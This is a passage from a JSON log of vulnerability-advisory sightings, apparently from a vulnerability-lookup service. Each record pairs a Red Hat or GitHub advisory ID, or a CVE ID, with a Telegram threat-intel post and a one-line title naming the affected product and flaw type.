"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7201", "type": "seen", "source": "https://t.me/ctinow/195725", "content": "https://ift.tt/GulmzaY\nRHSA-2023:7201: Important: OpenShift Container Platform 4.15.0 packages and security update", "creation_timestamp": "2024-02-28T18:22:27.000000Z"}, {"uuid": "68ab5c90-fbf4-4983-8a91-fc5c3a033ca4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9VX6-7XXF-X967", "type": "seen", "source": "https://t.me/ctinow/197024", "content": "https://ift.tt/7Odp8vR\n[GHSA-9vx6-7xxf-x967] OpenZeppelin Contracts base64 encoding may read from potentially dirty memory", "creation_timestamp": "2024-02-29T21:27:01.000000Z"}, {"uuid": "cbc17813-4a5d-4b78-8a50-4ddf9cf8629b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-49W7-5R33-JM9M", "type": "seen", "source": "https://t.me/ctinow/197023", "content": "https://ift.tt/PXJVwmj\n[GHSA-49w7-5r33-jm9m] http-swagger XSS via PUT requests", "creation_timestamp": "2024-02-29T21:27:00.000000Z"}, {"uuid": "8d0db9dc-a2f0-4c03-be87-24d10ac5f359", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5PF6-2QWX-PXM2", "type": "seen", "source": "https://t.me/ctinow/201831", "content": "https://ift.tt/VTq523I\n[GHSA-5pf6-2qwx-pxm2] Go SDK for CloudEvents's use of WithRoundTripper to create a Client leaks credentials", "creation_timestamp": "2024-03-06T21:26:17.000000Z"}, {"uuid": "c084078e-04f4-4bcb-9b3d-cd05b61fdb0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J857-7RVV-VJ97", "type": "seen", "source": "https://t.me/ctinow/201812", "content": "https://ift.tt/It451SE\n[GHSA-j857-7rvv-vj97] JWCrypto vulnerable to JWT bomb Attack in `deserialize` function", "creation_timestamp": "2024-03-06T21:16:28.000000Z"}, {"uuid": "9c877474-9c42-4360-993f-4f305f5524ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H59X-P739-982C", "type": "seen", "source": "https://t.me/ctinow/201544", "content": "https://ift.tt/mpWRJou\n[GHSA-h59x-p739-982c] LangChain directory traversal vulnerability", "creation_timestamp": "2024-03-06T17:27:06.000000Z"}, {"uuid": "72cf8ce9-98dc-4bdb-9424-d708b3167ab5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8H4X-XVJP-VF99", "type": "seen", "source": "https://t.me/ctinow/203156", "content": "https://ift.tt/yp8c7WR\nCVE-2023-45860 | Hazelcast up to 5.3.4 CSV File Source Connector permission (GHSA-8h4x-xvjp-vf99)", "creation_timestamp": "2024-03-08T08:56:41.000000Z"}, {"uuid": "3f670c42-10e5-4d2e-b65c-83021d249a0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/203977", "content": "https://ift.tt/jFIrfUV\nCVE-2019-13730 | Google Chrome prior 79.0.3945.79 Javascript HTML Page type confusion (RHSA-2019:4238)", "creation_timestamp": "2024-03-09T15:46:50.000000Z"}, {"uuid": "458e2889-f219-4938-a461-63a7f3860fb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R275-J57C-7MF2", "type": "seen", "source": "https://t.me/ctinow/203417", "content": "https://ift.tt/b3Z9uK2\nCVE-2023-47634 | Decidim up to 0.26.8/0.27.4 Endorsement race condition (GHSA-r275-j57c-7mf2)", "creation_timestamp": "2024-03-08T16:21:37.000000Z"}, {"uuid": "546fdbff-1226-428d-95be-0e6ab6aef8e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HJ3V-M684-V259", "type": "seen", "source": "https://t.me/ctinow/203413", "content": "https://ift.tt/oeh3zSR\n[GHSA-hj3v-m684-v259] JWX vulnerable to a denial of service attack using compressed JWE message", "creation_timestamp": "2024-03-08T16:16:46.000000Z"}, {"uuid": "2d2f74d9-ba0f-4512-b08a-df73e5874fb0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/204139", "content": "https://ift.tt/Yj4KmgS\nCVE-2019-13764 | Google Chrome prior 79.0.3945.79 Javascript HTML Page type confusion (RHSA-2019:4238)", "creation_timestamp": "2024-03-10T08:11:22.000000Z"}, {"uuid": "99f81861-28a2-45ec-934a-b43780bd9553", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/204131", "content": "https://ift.tt/4U6o98i\nCVE-2019-13757 | Google Chrome prior 79.0.3945.79 Omnibox Domain input validation (RHSA-2019:4238)", "creation_timestamp": "2024-03-10T07:36:51.000000Z"}, {"uuid": "d6fc21a6-4f35-4475-bd42-d88bc6e628fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/204125", "content": "https://ift.tt/ROcqL4K\nCVE-2019-13756 | Google Chrome prior 79.0.3945.79 Security UI HTML Page Domain input validation (RHSA-2019:4238)", "creation_timestamp": "2024-03-10T07:06:40.000000Z"}, {"uuid": "a254c74e-908c-4bc1-87e8-d7b523d4b86a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/204012", "content": "https://ift.tt/O247H6E\nCVE-2019-13746 | Google Chrome prior 79.0.3945.79 Omnibox HTML Page URL input validation (RHSA-2019:4238)", "creation_timestamp": "2024-03-09T17:17:02.000000Z"}, {"uuid": "b2a8daf2-0d88-4964-8c99-f1fd016e4333", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/204011", "content": "https://ift.tt/MCsx7OV\nCVE-2019-13745 | Google Chrome prior 79.0.3945.79 Audio HTML Page information disclosure (RHSA-2019:4238)", "creation_timestamp": "2024-03-09T17:17:00.000000Z"}, {"uuid": "9ecedb1d-231d-4e7a-bbb4-0d485d873c08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/204010", "content": "https://ift.tt/IYdLPih\nCVE-2019-13744 | Google Chrome prior 79.0.3945.79 Policy Enforcement HTML Page information disclosure (RHSA-2019:4238)", "creation_timestamp": "2024-03-09T17:16:59.000000Z"}, {"uuid": "9984c316-e31e-4fce-8931-85670c4cc4a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/204000", "content": "https://ift.tt/xvp5lIN\nCVE-2019-13743 | Google Chrome prior 79.0.3945.79 Security UI HTML Page input validation (RHSA-2019:4238)", "creation_timestamp": "2024-03-09T16:46:42.000000Z"}, {"uuid": "d60cd60c-0570-4def-9dad-a5234395a44d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/203999", "content": "https://ift.tt/INdwAMR\nCVE-2019-13742 | Google Chrome prior 79.0.3945.79 on iOS Omnibox Domain input validation (RHSA-2019:4238)", "creation_timestamp": "2024-03-09T16:46:41.000000Z"}, {"uuid": "0338f59b-c56a-477e-bd41-7e96ce8bb25e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/203998", "content": "https://ift.tt/3ldkyM6\nCVE-2019-13741 | Google Chrome prior 79.0.3945.79 Blink input validation (RHSA-2019:4238)", "creation_timestamp": "2024-03-09T16:46:40.000000Z"}, {"uuid": "4921ab1d-4315-4fc0-9b9c-f68b1968213b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/203970", "content": "https://ift.tt/B7JCmf4\nCVE-2019-13727 | Google Chrome prior 79.0.3945.79 WebSocket HTML Page permission assignment (RHSA-2019:4238)", "creation_timestamp": "2024-03-09T15:16:35.000000Z"}, {"uuid": "d8160e41-aa09-476c-ab9e-659bb352e259", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/204023", "content": "https://ift.tt/yvTtK7L\nCVE-2019-13751 | Google Chrome prior 79.0.3945.79 SQLite HTML Page information disclosure (RHSA-2019:4238)", "creation_timestamp": "2024-03-09T17:46:31.000000Z"}, {"uuid": "cc706655-5965-434d-8c56-0811ffa6b8b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/204022", "content": "https://ift.tt/wHg48E9\nCVE-2019-13750 | Google Chrome prior 79.0.3945.79 SQLite HTML Page input validation (RHSA-2019:4238)", "creation_timestamp": "2024-03-09T17:46:30.000000Z"}, {"uuid": "bf6c113f-5e84-426a-8b02-d8876a54a8bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/204021", "content": "https://ift.tt/SmoyHvQ\nCVE-2019-13749 | Google Chrome prior 79.0.3945.79 on iOS Omnibox HTML Page Address input validation (RHSA-2019:4238)", "creation_timestamp": "2024-03-09T17:46:29.000000Z"}, {"uuid": "eafb15bf-5fb8-40f4-9bb9-0c4919d8629a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/204020", "content": "https://ift.tt/KQiaJEr\nCVE-2019-13748 | Google Chrome prior 79.0.3945.79 Developer Tools HTML Page input validation (RHSA-2019:4238)", "creation_timestamp": "2024-03-09T17:46:28.000000Z"}, {"uuid": "ddb3b004-9b41-40cc-a8fd-2aacb7786748", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/204013", "content": "https://ift.tt/qtgHOuN\nCVE-2019-13747 | Google Chrome prior 79.0.3945.79 on Android HTML Page input validation (RHSA-2019:4238)", "creation_timestamp": "2024-03-09T17:17:03.000000Z"}, {"uuid": "2ffcde31-b847-473b-aa2c-4a8d84c2510a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/203984", "content": "https://ift.tt/tWcTok8\nCVE-2019-13736 | Google Chrome prior 79.0.3945.79 PDFium PDF File integer overflow (RHSA-2019:4238)", "creation_timestamp": "2024-03-09T16:11:30.000000Z"}, {"uuid": "1af7f647-409e-475f-9135-738898672504", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/203983", "content": "https://ift.tt/RePLgdU\nCVE-2019-13735 | Google Chrome prior 79.0.3945.79 Javascript HTML Page out-of-bounds write (RHSA-2019:4238)", "creation_timestamp": "2024-03-09T16:11:29.000000Z"}, {"uuid": "a7397e8f-b63b-400c-acd3-efadc86efadf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/204034", "content": "https://ift.tt/WfeCUqT\nCVE-2019-13754 | Google Chrome prior 79.0.3945.79 Extension HTML Page input validation (RHSA-2019:4238)", "creation_timestamp": "2024-03-09T18:17:04.000000Z"}, {"uuid": "f8ec8636-1b1b-4971-ad8f-d72935f8760d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/204033", "content": "https://ift.tt/fdBXq2z\nCVE-2019-13753 | Google Chrome prior 79.0.3945.79 SQLite HTML Page out-of-bounds (RHSA-2019:4238)", "creation_timestamp": "2024-03-09T18:17:02.000000Z"}, {"uuid": "1f107b1b-354a-48e2-8ba7-34231fe7e1b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/204032", "content": "https://ift.tt/Xfhvbi8\nCVE-2019-13752 | Google Chrome prior 79.0.3945.79 SQLite HTML Page out-of-bounds (RHSA-2019:4238)", "creation_timestamp": "2024-03-09T18:17:01.000000Z"}, {"uuid": "1bfdc1a5-8860-4699-b53b-fcc58da7a3dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/203987", "content": "https://ift.tt/LS6Tg9E\nCVE-2019-13739 | Google Chrome prior 79.0.3945.79 Policy Enforcement Domain input validation (RHSA-2019:4238)", "creation_timestamp": "2024-03-09T16:11:33.000000Z"}, {"uuid": "20bd5097-7957-4ae5-af51-76a4e10ace7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0959", "type": "seen", "source": "https://t.me/ctinow/195723", "content": "https://ift.tt/oT1lnQw\nRHSA-2024:0959: Important: thunderbird security update", "creation_timestamp": "2024-02-28T18:22:25.000000Z"}, {"uuid": "01e4e37f-0e9a-485c-9e23-ba6db0b08e7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0964", "type": "seen", "source": "https://t.me/ctinow/195722", "content": "https://ift.tt/r8SRQEm\nRHSA-2024:0964: Important: thunderbird security update", "creation_timestamp": "2024-02-28T18:22:24.000000Z"}, {"uuid": "89c5c4b9-8541-43de-b5b6-254cca4fa37f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0965", "type": "seen", "source": "https://t.me/ctinow/195721", "content": "https://ift.tt/a6YsxO3\nRHSA-2024:0965: Important: unbound security update", "creation_timestamp": "2024-02-28T18:22:23.000000Z"}, {"uuid": "8d3a937e-621c-4321-a20d-f64df373f762", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/203985", "content": "https://ift.tt/4RPfm52\nCVE-2019-13737 | Google Chrome prior 79.0.3945.79 Policy Enforcement HTML Page information disclosure (RHSA-2019:4238)", "creation_timestamp": "2024-03-09T16:11:31.000000Z"}, {"uuid": "3511aab6-93ba-426b-9e6e-5f4c53a5890e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6Q4W-9X56-RMWQ", "type": "seen", "source": "https://t.me/ctinow/203717", "content": "https://ift.tt/1W6cvUZ\n[GHSA-6q4w-9x56-rmwq] Deno arbitrary file descriptor close via `op_node_ipc_pipe()` leading to permission prompt bypass", "creation_timestamp": "2024-03-09T02:01:26.000000Z"}, {"uuid": "bb43a95d-4807-47cd-86b1-0512c8794665", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XHJW-7VH5-QXQM", "type": "seen", "source": "https://t.me/ctinow/203513", "content": "https://ift.tt/cvXrG0o\n[GHSA-xhjw-7vh5-qxqm] LibOSDP RMAC revert to the beginning of the session", "creation_timestamp": "2024-03-08T18:46:51.000000Z"}, {"uuid": "ff1a8926-d186-468a-9bc2-88d873bcc3d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7945-5MCV-F2PP", "type": "seen", "source": "https://t.me/ctinow/203512", "content": "https://ift.tt/YqcTW4A\n[GHSA-7945-5mcv-f2pp] LibOSDP vulnerable to a null pointer deref in osdp_reply_name", "creation_timestamp": "2024-03-08T18:46:50.000000Z"}, {"uuid": "2fe7b87f-fea3-4e08-8687-adf755d28875", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MH67-4H3Q-P437", "type": "seen", "source": "https://t.me/ctinow/203497", "content": "https://ift.tt/YQVxyL6\nCVE-2023-6881 | zephyrproject-rtos Zephyr up to 3.5 is_mount_point buffer overflow (GHSA-mh67-4h3q-p437)", "creation_timestamp": "2024-03-08T18:27:05.000000Z"}, {"uuid": "4d5f0595-caeb-48fd-942e-be76f8f8149a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-35JJ-WX47-4W8R", "type": "seen", "source": "https://t.me/ctinow/203609", "content": "https://ift.tt/gFxnq24\n[GHSA-35jj-wx47-4w8r] WeasyPrint allows the attachment of arbitrary files and URLs to a PDF", "creation_timestamp": "2024-03-08T21:52:10.000000Z"}, {"uuid": "a10ae39d-6f8e-4624-a758-60a18d538a2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FVX8-79HX-X82F", "type": "seen", "source": "https://t.me/ctinow/203453", "content": "https://ift.tt/5TDgY29\n[GHSA-fvx8-79hx-x82f] Django MarkdownX Cross-Site Scripting (XSS) vulnerability", "creation_timestamp": "2024-03-08T17:37:29.000000Z"}, {"uuid": "1c9c39d0-333b-442a-b4d2-07e189fb7296", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3RXX-8F33-7P6P", "type": "seen", "source": "https://t.me/ctinow/197021", "content": "https://ift.tt/qm9JxDg\n[GHSA-3rxx-8f33-7p6p] Concrete CMS Cross Site Request Forgery (CSRF) vulnerability", "creation_timestamp": "2024-02-29T21:26:57.000000Z"}, {"uuid": "fd63a098-147a-411c-9a54-63460e72437f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-45M2-8Q7F-93WV", "type": "seen", "source": "https://t.me/ctinow/197020", "content": "https://ift.tt/qomlYUs\n[GHSA-45m2-8q7f-93wv] Concrete CMS Cross Site Request Forgery (CSRF) vulnerability", "creation_timestamp": "2024-02-29T21:26:56.000000Z"}, {"uuid": "f2e785da-c261-408e-8061-0b19405f4e2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V63X-XC9J-HHVQ", "type": "seen", "source": "https://t.me/ctinow/202825", "content": "https://ift.tt/YwMUQNd\nCVE-2019-10769 | safer-eval on npm Sandbox input validation (GHSA-v63x-xc9j-hhvq)", "creation_timestamp": "2024-03-07T22:16:39.000000Z"}, {"uuid": "c1b55693-abd5-40f3-8375-b40e235e0da4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1239", "type": "seen", "source": "https://t.me/ctinow/202823", "content": "https://ift.tt/4dXGjAn\nRHSA-2024:1239: Moderate: opencryptoki security update", "creation_timestamp": "2024-03-07T22:16:36.000000Z"}, {"uuid": "55030fab-5ad3-47dc-958f-5de68f4e63e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7XX3-M584-X994", "type": "seen", "source": "https://t.me/ctinow/202551", "content": "https://ift.tt/ily5GrH\nCVE-2019-16770 | Puma Connection Request allocation of resources (GHSA-7xx3-m584-x994)", "creation_timestamp": "2024-03-07T16:41:15.000000Z"}, {"uuid": "cfdadced-5b99-4571-ad7d-620b8fc40d30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H9RV-JMMF-4PGX", "type": "seen", "source": "https://t.me/ctinow/202550", "content": "https://ift.tt/9DAe4Ls\nCVE-2019-16769 | Yahoo serialize-javascript cross site scripting (GHSA-h9rv-jmmf-4pgx)", "creation_timestamp": "2024-03-07T16:41:13.000000Z"}, {"uuid": "9b7ea590-12ea-45ad-a942-5fa22224b3a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XXV9-W5HM-328J", "type": "seen", "source": "https://t.me/ctinow/201773", "content": "https://ift.tt/8NT4L59\n[GHSA-xxv9-w5hm-328j] Jenkins AppSpider Plugin missing permission checks", "creation_timestamp": "2024-03-06T20:31:19.000000Z"}, {"uuid": "7062deb8-9efd-42db-aba8-3de092cbbc44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1195", "type": "seen", "source": "https://t.me/ctinow/201604", "content": "https://ift.tt/PDTtfYa\nRHSA-2024:1195: Important: postgresql:12 security update", "creation_timestamp": "2024-03-06T18:16:43.000000Z"}, {"uuid": "eac99643-bb11-4f7f-9842-276656e6b59c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P2GX-4434-PF6G", "type": "seen", "source": "https://t.me/ctinow/201603", "content": "https://ift.tt/YCxJEkK\n[GHSA-p2gx-4434-pf6g] Apache InLong Deserialization of Untrusted Data Vulnerability", "creation_timestamp": "2024-03-06T18:16:41.000000Z"}, {"uuid": "427ecebc-d945-4c17-ad9e-ff7d45d8ff56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H5CG-53G7-GQJW", "type": "seen", "source": "https://t.me/ctinow/201602", "content": "https://ift.tt/aYitNbx\n[GHSA-h5cg-53g7-gqjw] RPyC's missing security check results in code execution when using numpy.array on the server-side.", "creation_timestamp": "2024-03-06T18:16:40.000000Z"}, {"uuid": "cbd5bd03-eb37-4c73-af81-a4d504b406b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3J27-563V-28WF", "type": "seen", "source": "https://t.me/ctinow/201597", "content": "https://ift.tt/KxBgqYk\n[GHSA-3j27-563v-28wf] *const c_void / ExternalPointer unsoundness leading to use-after-free", "creation_timestamp": "2024-03-06T18:16:34.000000Z"}, {"uuid": "d6cae589-2e82-4c33-9053-dce3f5eed33a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9Q24-HWMC-797X", "type": "seen", "source": "https://t.me/ctinow/191238", "content": "https://ift.tt/rDsxRiv\n[GHSA-9q24-hwmc-797x] Apache Answer Race Condition vulnerability", "creation_timestamp": "2024-02-22T22:46:26.000000Z"}, {"uuid": "bded8b63-b52f-4e4b-9b65-b049ecc46ac8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0514", "type": "seen", "source": "https://t.me/ctinow/208482", "content": "https://ift.tt/JEkUt0V\nCVE-2019-19880 | SQLite 3.30.1 ORDER BY window.c exprListAppendList null pointer dereference (RHSA-2020:0514)", "creation_timestamp": "2024-03-15T08:12:02.000000Z"}, {"uuid": "076e5fae-7da5-49b6-bcc0-4e1d63c92ecc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0702", "type": "seen", "source": "https://t.me/ctinow/208674", "content": "https://ift.tt/ZnDOM7s\nCVE-2018-1311 | Apache Xerces-C up to 3.2.2 XML Parser XERCES_DISABLE_DTD use after free (RHSA-2020:0702)", "creation_timestamp": "2024-03-15T12:17:04.000000Z"}, {"uuid": "91b1a007-ffdc-4c7b-a8ef-a6dfd473553a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PWX5-6WXG-PX5H", "type": "seen", "source": "https://t.me/ctinow/208218", "content": "https://ift.tt/4OcFTte\n[GHSA-pwx5-6wxg-px5h] Insecure Variable Substitution in Vela", "creation_timestamp": "2024-03-14T22:21:52.000000Z"}, {"uuid": "b4786745-9ea9-4703-91b7-a7314a53cdfd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8832-4MM5-X2R6", "type": "seen", "source": "https://t.me/ctinow/208196", "content": "https://ift.tt/I7Gys51\n[GHSA-8832-4mm5-x2r6] discordrb OS Command Injection vulnerability", "creation_timestamp": "2024-03-14T21:46:47.000000Z"}, {"uuid": "9e2c897d-318b-445c-a554-dd971942fc7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3Q6G-QMPX-RQW4", "type": "seen", "source": "https://t.me/ctinow/208195", "content": "https://ift.tt/4wdlQ1M\n[GHSA-3q6g-qmpx-rqw4] Whoogle Search Server-Side Request Forgery vulnerability", "creation_timestamp": "2024-03-14T21:46:45.000000Z"}, {"uuid": "18dc0142-4fef-4cbf-a920-1fdd6b2d6541", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HH2Q-QV66-JCQG", "type": "seen", "source": "https://t.me/ctinow/208194", "content": "https://ift.tt/kydHxEI\n[GHSA-hh2q-qv66-jcqg] Whoogle Search Path Traversal vulnerability", "creation_timestamp": "2024-03-14T21:46:44.000000Z"}, {"uuid": "76da1228-4352-48d5-ac17-79d0e73b7547", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-59J8-776V-XXXG", "type": "seen", "source": "https://t.me/ctinow/198611", "content": "https://ift.tt/PncDXHk\nCVE-2024-21624 | nonebot2 Message Template special elements used in a template engine (GHSA-59j8-776v-xxxg)", 